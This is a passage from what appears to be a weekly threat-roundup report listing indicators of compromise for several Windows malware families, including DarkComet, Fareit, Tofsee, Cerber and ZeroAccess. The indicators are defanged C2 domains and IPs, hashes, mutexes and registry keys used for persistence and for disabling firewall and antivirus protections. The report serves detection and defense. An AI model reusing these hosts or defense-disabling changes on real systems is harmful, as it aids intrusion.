IOCs\n\nDomain Names contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`www[.]4celia[.]com` | 16 \n`travalogo[.]com` | 9 \n`miracles-of-quran[.]com` | 9 \n`capsaciphone[.]com` | 9 \n`essay[.]essaytutors[.]net` | 9 \n`smtp[.]secureserver[.]net` | 2 \n`pop[.]secureserver[.]net` | 2 \n`mail[.]secureserver[.]net` | 2 \n`secure[.]emailsrvr[.]com` | 2 \n`outlook[.]office365[.]com` | 2 \n`smtp[.]263[.]net` | 2 \n`smtp[.]aruba[.]it` | 2 \n`securepop[.]t-online[.]de` | 2 \n`mail[.]eim[.]ae` | 2 \n`exmail[.]emirates[.]net[.]ae` | 2 \n`mail[.]pec[.]aruba[.]it` | 2 \n`p02-imap[.]mail[.]me[.]com` | 2 \n`mbox[.]cert[.]legalmail[.]it` | 2 \n`smtp[.]pec[.]aruba[.]it` | 2 \n`pop3s[.]pec[.]aruba[.]it` | 2 \n`pop[.]pec[.]istruzione[.]it` | 2 \n`pop3[.]itevelesa[.]com` | 2 \n`smtp[.]mweb[.]co[.]zw` | 2 \n`mail[.]eitelux[.]es` | 2 \n`pop[.]realperfil[.]com[.]br` | 2 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%HOMEPATH%\\245.exe` | 16 \n`%SystemRoot%\\SysWOW64\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat` | 7 \n`%TEMP%\\CVRA52.tmp` | 1 \n \n#### File Hashes\n\n` 1de08bdcceee9ce5642c85db384163a76e4de953c2e625c944ef1b087c483f4b 24b7af440ef4ac270373b6f5c9514885a3224c046b73cf8ad2f1f43012b2ab79 2b5e8a119ff94422a9b5213562ea161306d91d255b13e8840b8c6e405ca767ca 342e32ccf662f9fdae9df6d332382b5332fd41f47ae970c42197100ccc29bdb2 3c790759a0f56659200ee93697ec8fef684ac4e241545c7e82399cbe5128ce12 47b2096a5d64d83ce0216c4b577d40567e51bdfb7456f2642dbe2222d0fc9ac9 4810b72b5ce022be0b50fb4cc530fa10f8d4351d66c6384eb86ca6a714f697b1 713407b0e97009b83eb112b7c22588ddf4ccc8418fd548ffe8dded8774698894 902d50419ed4b29f175944cd6d1f59d1b06a26b9a659cd04d282c3685cc478d6 adc96e8b0fdb5d977111b124c655a1821d5c9c0810207aaa82ccb5bacc0c6698 b512845fd39f154b9208e59762e4f136838ca52666e4ca598a3e99c90d332061 c5ea35ff71f952e64d69779eb8dfe98d0a8a77f727fae139a66125ad76c3526f cb03c4ba3c52376950f5924ac4491ddb0afff6e5c5d5d2f1512e042c8116ff2a 
cb33e2134b2670a581eaefc1b800721a0c49e96441027948463c32db39e75fbb ccba54f7ed9d278c4b0cf8a2b8f5f33d3410349d3fae416fb69388f15874f84d deb94515bf4c10daa7c26a3c0fa8ed837ee3ad54176a9d4d3d1b5c6230a2447c `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-hAH9yd4KNjc/XfPD3VVW5fI/AAAAAAAAC_U/yypPu7ryWkoAfHGAfeBH-nBnytZtZLW3ACLcBGAsYHQ/s1600/ccba54f7ed9d278c4b0cf8a2b8f5f33d3410349d3fae416fb69388f15874f84d_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-qZUGQYPaptM/XfPD8y1LctI/AAAAAAAAC_Y/2kK2x-JVk3sRqEtLeanaeh-0QMsYU2_UQCLcBGAsYHQ/s1600/ccba54f7ed9d278c4b0cf8a2b8f5f33d3410349d3fae416fb69388f15874f84d_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-uACqF7F7X_0/XfPElV2C7NI/AAAAAAAAC_k/y5DPae0OFzM1MBgEdE008MgwviXQPXmcgCLcBGAsYHQ/s1600/adc96e8b0fdb5d977111b124c655a1821d5c9c0810207aaa82ccb5bacc0c6698_umbrella.png>)\n\n \n\n\n#### Malware\n\n[](<https://1.bp.blogspot.com/-jLT8uQmMiWQ/XfPEpChE_2I/AAAAAAAAC_o/Jwsv4qdfMs4-ynAObHASCw5wKtZWg2L3ACLcBGAsYHQ/s1600/ccba54f7ed9d278c4b0cf8a2b8f5f33d3410349d3fae416fb69388f15874f84d_malware.png>)\n\n \n\n\n* * *\n\n### Win.Packed.Razy-7434602-0\n\n#### Indicators of Compromise\n\nMutexes | Occurrences \n---|--- \n`frenchy_shellcode_006` | 10 \n`Startup_shellcode_006` | 10 \n`Global\\{b0cec92d-4b6c-4178-94fb-bf6cc1add43d}` | 10 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`107[.]172[.]83[.]151` | 10 \nDomain Names contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`dec8973[.]duckdns[.]org` | 10 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5` | 10 \n`%APPDATA%\\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\\Logs` | 10 \n`%APPDATA%\\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\\Logs\\Administrator` | 10 \n`%APPDATA%\\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\\run.dat` | 10 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\HJdyTuap.exe` | 10 \n`%HOMEPATH%\\ophan.exe` | 10 \n \n#### File Hashes\n\n` 02252b22b7b50a36851f97a612057c61a8aeed4a2d7cc18258fe2ba6d70fe6a5 147eace098585f42a45f6a1cabeb4885f47038f1da2e8dbf700795b7f5176165 472334c6964fa75128a812e1f819693c4a3b19d43466fb01e88d16a04366487b 5928dd708f5190db002c2ac530f61b994ef6667e59894ae7f085296e451cb06d 59ef7cbae939ff16e921afa54d76b2ed960a7c982fd1b41b318e2e840fa67690 8f5d1ed403153ce043daabd92c15452f01142a829ebaa0530a690ca7bf16d8b1 9708566442ccfc689c110efa436095f21a6d2e15ab1a5a5d5bf35d9ce1063768 a9844ac5e8f56a958e42500b31d6e902120d385f373599eeafc9d4316c6ff2e7 c7b1a3495bb7fb1f8f4016952f6ee68873bd6d4c39468602bc97e59eb8cc9177 d9e7d0ae7bacf011c0abfee024872bb7662b06b4f5faa87efc8eccb7ad02a633 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-Aj5C206TAoY/XfPE34ifELI/AAAAAAAAC_w/tWwg4GTVGwAlCG0fpEbGO7Y1ZMzEdgJ6wCLcBGAsYHQ/s1600/147eace098585f42a45f6a1cabeb4885f47038f1da2e8dbf700795b7f5176165_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-CHVhE-2NcDs/XfPE908n6FI/AAAAAAAAC_0/ZrZqqDdn9mE1XzbaZy7CqVECbCeaoCRUgCLcBGAsYHQ/s1600/147eace098585f42a45f6a1cabeb4885f47038f1da2e8dbf700795b7f5176165_tg.png>)\n\n \n\n\n* * *\n\n### Win.Packed.DarkComet-7433889-1\n\n#### Indicators of Compromise\n\nRegistry Keys | 
Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\DC3_FEXEC ` | 13 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN ` | 6 \n`<HKCU>\\SOFTWARE\\DC3_FEXEC \nValue Name: 12/6/2019 at 1:01:19 PM ` | 4 \n`<HKCU>\\SOFTWARE\\DC3_FEXEC \nValue Name: 12/6/2019 at 1:01:20 PM ` | 4 \n`<HKCU>\\SOFTWARE\\DC3_FEXEC \nValue Name: 12/6/2019 at 1:01:18 PM ` | 3 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: MicroUpdate ` | 3 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON \nValue Name: UserInit ` | 3 \n`<HKCU>\\HKEY_CURRENT_USER ` | 2 \n`<HKCU>\\HKEY_CURRENT_USER\\SOFTWARE ` | 2 \n`<HKCU>\\HKEY_CURRENT_USER\\SOFTWARE\\MICROSOFT ` | 2 \n`<HKCU>\\HKEY_CURRENT_USER\\SOFTWARE\\MICROSOFT\\ACTIVE SETUP ` | 2 \n`<HKCU>\\HKEY_CURRENT_USER\\SOFTWARE\\MICROSOFT\\ACTIVE SETUP\\INSTALLED COMPONENTS ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Java Updater 12.02.3 ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: Java Updater ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS \nValue Name: Load ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: IE Per-User Initialization utility ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: IE Per-User Initialization utility ` | 2 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON \nValue Name: Userinit ` | 2 \n`<HKCU>\\SOFTWARE\\DC3_FEXEC \nValue Name: 12/6/2019 at 1:01:24 PM ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED \nValue Name: Hidden ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS\\PARAMETERS\\FIREWALLPOLICY\\STANDARDPROFILE \nValue Name: EnableFirewall ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS\\PARAMETERS\\FIREWALLPOLICY\\STANDARDPROFILE \nValue Name: DisableNotifications ` | 1 
\n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: AntiVirusDisableNotify ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: UpdatesDisableNotify ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WSCSVC \nValue Name: Start ` | 1 \nMutexes | Occurrences \n---|--- \n`DC_MUTEX-<random, matching [A-Z0-9]{7}>` | 12 \n`DCPERSFWBP` | 4 \n`Paint` | 1 \n`Administrator5` | 1 \n`zRfBoxVQtvcwCKzfoomrPWdIUUjnqiHWPygjEgky` | 1 \n`cbebf6a3c30e189f1791a07b91284eaf` | 1 \n`UNwehCeiwHcpcPqMLnVm` | 1 \n`Global\\c8760b20-185a-11ea-a007-00501e3ae7b5` | 1 \n`wHcpcPqMLnVmYcCcnhzwUpOGDOftPDMkeIKqqMLnVmYcCcnhzwUpOGDOftPDMkeIKqqMLnVmYcCcnhzwUpOGDOftPDMkeIKqqMLnVmYcCcnhzwUpOGDOftPDMkeIKqqMLnVmYcCcnhzwUpOGDOftPDMkeIKq` | 1 \n`yzxDnuCSssIxBsSuZXFtOFvJTDCppRZlOhNkDPDB` | 1 \n`NSaQvFFEJfmtYlkBEHyXmfPxzUwCPMuIhhJReGZF` | 1 \n`IRojNPvPVdSxHIGLipwanmDHJBaphSzCXzESOwLj` | 1 \n`orHcdnwrVlEYrlbHQQOTFxFjvvLPSKixqaILfIMa` | 1 \n`myCQlnwHCfuNhBukQZZY` | 1 \n`Global\\c923cf81-185a-11ea-a007-00501e3ae7b5` | 1 \n`uoHEavVNJUlBWJTqlPRxRXfUzJKINkqxcpoFJLDc` | 1 \n`bQvFGEJgmtYlkBFHyYnfQxzUwCPMuIhhJSeGaFdv` | 1 \n`JwuoGEavUaWilBWXgqlPew` | 1 \n`HusmFCYuTZVgjyUVfojNcvPidSxHIGLvpwan` | 1 \n`xXXyHTvPuSkKkvpIrOxJOL` | 1 \n`vkhbtqNjIOKVZnJLUdYCSkFYSInwwvzlelQcc` | 1 \n`iRfFFfoBdwczSrSdXpZvfpvrEUjqsCZUxzgmGOEj` | 1 \n`Global\\f44dbcc0-185a-11ea-a007-00501e3ae7b5` | 1 \n`QXCcOehkcBeJsodxoboyhhVHiFRfNeQUu` | 1 \n`ewtQmLRNYbqMNXgbFVnIbVLqyzxDoho` | 1 \n \n*See JSON for more IOCs\n\nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`78[.]159[.]135[.]230` | 4 \n`94[.]73[.]36[.]254` | 2 \n`104[.]16[.]155[.]36` | 1 \n`94[.]73[.]32[.]235` | 1 \n`94[.]73[.]33[.]36` | 1 \n`173[.]194[.]175[.]108/31` | 1 \n`54[.]231[.]48[.]43` | 1 \n`109[.]220[.]205[.]220` | 1 \n`90[.]197[.]55[.]134` | 1 \n`25[.]109[.]69[.]178` | 1 \nDomain Names contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`simond[.]zapto[.]org` | 4 \n`laloutrecam[.]no-ip[.]org` | 2 \n`botofvps[.]no-ip[.]biz` | 2 \n`whatismyipaddress[.]com` | 1 \n`s3-1[.]amazonaws[.]com` | 1 \n`s3[.]amazonaws[.]com` | 1 \n`zcitizen[.]no-ip[.]org` | 1 \n`server-49[.]sytes[.]net` | 1 \n`bbdl[.]ddns[.]net` | 1 \n`who-is[.]ddns[.]net` | 1 \n`update[.]imagineyourcraft[.]fr` | 1 \n`123[.]105[.]12[.]0[.]in-addr[.]arpa` | 1 \n`alaka[.]no-ip[.]biz` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\dclogs` | 11 \n`%TEMP%\\AdobeARM.exe` | 10 \n`%TEMP%\\resman.exe` | 7 \n`%TEMP%\\dw.log` | 4 \n`%TEMP%\\<random, matching '[A-F0-9]{4,5}'>.dmp` | 4 \n`%TEMP%\\<random, matching '[a-z]{4,9}'>.exe` | 4 \n`%HOMEPATH%\\My Documents\\MSDCSC\\msdcsc.exe` | 3 \n`%HOMEPATH%\\Documents\\MSDCSC` | 3 \n`%HOMEPATH%\\Documents\\MSDCSC\\msdcsc.exe` | 3 \n`%APPDATA%\\pid.txt` | 2 \n`%APPDATA%\\pidloc.txt` | 2 \n`%TEMP%\\garrys mod robot.jpg` | 2 \n`%TEMP%\\holderwb.txt` | 1 \n`\\Paint` | 1 \n`%ProgramFiles%\\Java\\jre8\\bin\\rmiregistry.exe` | 1 \n`%ProgramFiles%\\Java\\jre8\\bin\\servertool.exe` | 1 \n`%ProgramFiles%\\Java\\jre8\\bin\\tnameserv.exe` | 1 \n`%ProgramFiles%\\Java\\jre8\\bin\\unpack200.exe` | 1 \n`%ProgramFiles%\\Java\\jre8\\bin\\vjava.ico` | 1 \n`%ProgramFiles%\\Java\\jre8\\bin\\vjavacpl.ico` | 1 \n`%ProgramFiles%\\Java\\jre8\\bin\\vjavaw.ico` | 1 \n`%ProgramFiles%\\Java\\jre8\\bin\\vjavaws.ico` | 1 \n`%ProgramFiles%\\Microsoft Silverlight\\5.1.30514.0\\coregen.exe` | 1 \n`%ProgramFiles%\\Microsoft Silverlight\\vsllauncher.ico` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Paint.lnk` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 2d6da6399671b08e28a10df9bcf76061f4c98a1f65202fb0dffccd918a5554fc 3a7644b928b85c1e448fe7bb7ddf51056e63f49b9455aae7b2e38fb179559066 6001c594a9e3454fb9359b140dc22e106c5946c323029783e9f122ec285e0c65 79a1576d14b171ce34915fe40b021f73a9d607c2ada2be53e335f330b6cb858f 
879c8524b93f3699c02ca366b15677c03df4d5e4e8ba03b43907618adde5627f 908792a782735eb16c229b3b2648c8ea22348a2d378d428d4798fbb21cdca541 918928629a8e0059e82aaa4fe2f226f66a334ead2b8f85dd8eef6e5d288325dc 92729ba8ef8eabfc9b4e88443d94fba225c6a643871fddfc6bf9d8d173d4c7f6 a0f6ffb10dd497d92d870642f2ba86639b170486cbaead79d0a82bd2d7e5edf3 a1999cf773b35ebab2b29acc4d0c0fe92de4bea83e4ee118a2b9a2474b19956c af47feb292bf865a7d0fbf2a8da31f8d04b38c759f5850ef3510a5f2ecaedae1 b1a9a49194c72fe92df017167c753625a80173c81b8a17cb1b20c84093d10c02 bb7b89751f70e99fe62c1edaba821bb95dfab8b0c6d268b845f3f936f09113df bc49d905ffd3203d51e3684755fd2412fdc75ee977350da40db2cae357419bd9 bd9e2ff72624901bf190a22ba2a9419395024d280e7f9d140918ffaecf96065a de59098d7862ae86da6c3159093f1afd4aa72dfc7f6b2826e270e94b272fb7fb df237e6044ad335081f455ce70e0288453ce74c371016def916462e0d93d124e e8f164fe292feef26582e9af9d8e0fec11768a72fcb2202af7180a5a8efa46fa f893532e35d7503e3685c70aaf7a23ce371acc1d0e3779297aba47ae65e9e949 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-xsSsv4R3DXY/XfPFQYsOglI/AAAAAAAADAE/O4eD97SOIC0C1DZnSJZVZXpLMt2QCgDSgCLcBGAsYHQ/s1600/908792a782735eb16c229b3b2648c8ea22348a2d378d428d4798fbb21cdca541_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-pMYIc9eeOVo/XfPFVE_PuHI/AAAAAAAADAI/gLGOM-3Se2Uf_Pk8U37HLZ-OJIqxhmjLgCLcBGAsYHQ/s1600/908792a782735eb16c229b3b2648c8ea22348a2d378d428d4798fbb21cdca541_tg.png>)\n\n \n\n\n#### Malware\n\n[](<https://1.bp.blogspot.com/-5MegDd92Olw/XfPFfZ36goI/AAAAAAAADAQ/84qG0AdaeTkVTyCDIXOPRklB8rmGKmxMQCLcBGAsYHQ/s1600/6001c594a9e3454fb9359b140dc22e106c5946c323029783e9f122ec285e0c65_malware.png>)\n\n \n\n\n* * *\n\n### Win.Trojan.Gamarue-7440316-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences 
---|---
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN` (Value Name: `{77E00C05-FC14-92FB-C64D-2FAE1577C98A}`) | 8
`<HKCR>\CLSID\{B1D503C8-F3D9-54CE-C64D-2FAE1577C98A}` | 8
`<HKCR>\CLSID\{EBF02436-D427-0EEB-C64D-2FAE1577C98A}` | 8

Mutexes | Occurrences
---|---
`Santiv18` | 8

IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`217[.]23[.]1[.]27` | 8
`212[.]8[.]242[.]104` | 8

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`v1[.]eakalra[.]ru` | 8
`v1[.]op17[.]ru` | 8

Files and or directories created

*See JSON for more IOCs

#### File Hashes

*See JSON for more IOCs

#### Coverage

Product | Protection
---|---
AMP |
Cloudlock | N/A
CWS |
Email Security |
Network Security | N/A
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid |
Umbrella | N/A
WSA | N/A

#### Screenshots of Detection

AMP and ThreatGrid detection screenshots (images not included).

* * *

### Win.Dropper.Fareit-7431743-0

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKCU>\SOFTWARE\WINRAR` | 10
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN` (Value Name: `WindowsMonitorConfigs32`) | 10
`<HKCU>\SOFTWARE\WINRAR` (Value Name: `HWID`) | 10
`<HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000003E9` (Value Name: `F`) | 10
`<HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000001F5` (Value Name: `F`) | 10
`<HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000003EC` (Value Name: `F`) | 10
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS` (Value Name: `WindowsMonitorConfigs`) | 10
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS` (Value Name: `WindowsMonitorConfigs32`) | 10
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\NETWORKLIST\NLA\CACHE\INTRANET` (Value Name: `{9EB90D23-C5F9-4104-85A8-47DD7F6C4070}`) | 7

IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`37[.]10[.]116[.]208` | 10

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`loqapeek[.]pw` | 10
`xistoons[.]pw` | 10

Files and or directories created

*See JSON for more IOCs

#### File Hashes

*See JSON for more IOCs

#### Coverage

Product | Protection
---|---
AMP |
Cloudlock | N/A
CWS |
Email Security |
Network Security | N/A
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid |
Umbrella | N/A
WSA | N/A

#### Screenshots of Detection

AMP and ThreatGrid detection screenshots (images not included).

* * *

### Win.Dropper.Tofsee-7440661-0

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKU>\.DEFAULT\CONTROL PANEL\BUSES` | 2
`<HKU>\.DEFAULT\CONTROL PANEL\BUSES` (Value Name: `Config0`) | 2
`<HKU>\.DEFAULT\CONTROL PANEL\BUSES` (Value Name: `Config1`) | 2
`<HKCU>\SOFTWARE\MICROSOFT\IAM` (Value Name: `Server ID`) | 1
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS` (Value Name: `C:\Windows\SysWOW64\kdrxwekz`) | 1
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\KDRXWEKZ` (Value Name: `Type`) | 1
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\KDRXWEKZ` (Value Name: `Start`) | 1
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\KDRXWEKZ` (Value Name: `ErrorControl`) | 1
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\KDRXWEKZ` (Value Name: `DisplayName`) | 1
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\KDRXWEKZ` (Value Name: `WOW64`) | 1
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\KDRXWEKZ` (Value Name: `ObjectName`) | 1
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\KDRXWEKZ` (Value Name: `Description`) | 1
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS` (Value Name: `C:\Windows\SysWOW64\piwcbjpe`) | 1
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\PIWCBJPE` (Value Name: `Type`) | 1
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\PIWCBJPE` (Value Name: `Start`) | 1
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\PIWCBJPE` (Value Name: `ErrorControl`) | 1
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\PIWCBJPE` (Value Name: `DisplayName`) | 1
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\PIWCBJPE` (Value Name: `WOW64`) | 1
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\PIWCBJPE` (Value Name: `ObjectName`) | 1
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\PIWCBJPE` (Value Name: `Description`) | 1
`<HKU>\.DEFAULT\CONTROL PANEL\BUSES` (Value Name: `Config3`) | 1
`<HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5` (Value Name: `apiMPQEC`) | 1
`<HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5` | 1
`<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES\75E0ABB6138512271C04F85FDDDE38E4B7242EFE` (Value Name: `Blob`) | 1
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\PIWCBJPE` | 1

Mutexes | Occurrences
---|---
`Global\syncronize_URN0LVA` | 2
`Global\syncronize_URN0LVU` | 2
`A16467FA7-343A2EC6-F2351354-B9A74ACF-1DC8406A` | 1
`Global\9776ba01-1ac7-11ea-a007-00501e3ae7b5` | 1
`Global\990ba241-1ac7-11ea-a007-00501e3ae7b5` | 1
`Global\95700cc1-1ac7-11ea-a007-00501e3ae7b5` | 1
`{<random GUID>}` | 1
`Local\{<random GUID>}` | 1

IP Addresses contacted by malware. Does not indicate maliciousness

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousness

*See JSON for more IOCs

Files and or directories created

*See JSON for more IOCs

#### File Hashes

*See JSON for more IOCs

#### Coverage

Product | Protection
---|---
AMP |
Cloudlock | N/A
CWS |
Email Security |
Network Security | N/A
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid |
Umbrella |
WSA |

#### Screenshots of Detection

AMP, ThreatGrid and Umbrella detection screenshots (images not included).

* * *

### Win.Ransomware.Cerber-7432369-1

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKCU>\SOFTWARE\MICROSOFT\SPEECH\VOICES` (Value Name: `DefaultTokenId`) | 33
`<HKCU>\SOFTWARE\MICROSOFT\SPEECH\VOICES` | 33
`<HKLM>\SYSTEM\CONTROLSET001\CONTROL\SESSION MANAGER` | 32
`<HKLM>\SYSTEM\CONTROLSET001\CONTROL\SESSION MANAGER` (Value Name: `PendingFileRenameOperations`) | 31
`<HKCU>\SOFTWARE\MICROSOFT\DIRECT3D` (Value Name: `Name`) | 1

Mutexes | Occurrences
---|---
`shell.{381828AA-8B28-3374-1B67-35680555C5EF}` | 33
`Local\MidiMapper_modLongMessage_RefCnt` | 33
`shell.{<random GUID>}` | 27

IP Addresses contacted by malware. Does not indicate maliciousness

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`api[.]blockcypher[.]com` | 33
`bc-prod-web-lb-430045627[.]us-east-1[.]elb[.]amazonaws[.]com` | 25
`hjhqmbxyinislkkt[.]1j9r76[.]top` | 22
`bitaps[.]com` | 11
`chain[.]so` | 11
`btc[.]blockr[.]io` | 11
`hjhqmbxyinislkkt[.]1a8u1r[.]top` | 1

Files and or directories created
*See JSON for more IOCs

#### File Hashes

*See JSON for more IOCs

#### Coverage

Product | Protection
---|---
AMP |
Cloudlock | N/A
CWS |
Email Security |
Network Security |
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid |
Umbrella |
WSA |

#### Screenshots of Detection

AMP, ThreatGrid, Umbrella and malware screenshots (images not included).

* * *

### Win.Trojan.ZeroAccess-7432508-1

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IPHLPSVC` (Value Name: `Start`) | 31
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS` (Value Name: `DeleteFlag`) | 31
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC` (Value Name: `DeleteFlag`) | 31
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC` (Value Name: `DeleteFlag`) | 31
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\BROWSER` (Value Name: `Start`) | 31
`<HKCR>\CLSID\{FBEB8A05-BEEE-4442-804E-409D6C4515E9}\INPROCSERVER32` (Value Name: `ThreadingModel`) | 31
`<HKCR>\CLSID\{FBEB8A05-BEEE-4442-804E-409D6C4515E9}\INPROCSERVER32` | 31
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN` (Value Name: `Windows Defender`) | 31
`<HKLM>\SOFTWARE\CLASSES\CLSID\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\INPROCSERVER32` | 31
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS` (Value Name: `Type`) | 31
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS` (Value Name: `ErrorControl`) | 31
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IPHLPSVC` (Value Name: `Type`) | 31
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IPHLPSVC` (Value Name: `ErrorControl`) | 31
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IPHLPSVC` (Value Name: `DeleteFlag`) | 31
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC` (Value Name: `Type`) | 31
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC` (Value Name: `ErrorControl`) | 31
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC` (Value Name: `Type`) | 31
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC` (Value Name: `ErrorControl`) | 31
